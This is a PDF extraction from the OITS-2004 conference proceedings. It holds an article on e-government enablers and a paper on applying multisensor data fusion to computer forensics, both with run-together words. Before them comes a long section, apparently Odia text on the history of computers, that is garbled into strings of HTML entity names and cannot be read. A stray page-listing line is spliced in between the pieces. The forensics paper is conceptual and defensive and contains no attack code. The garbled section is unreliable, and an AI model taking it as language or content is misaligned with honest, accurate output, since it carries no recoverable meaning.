AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 18: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

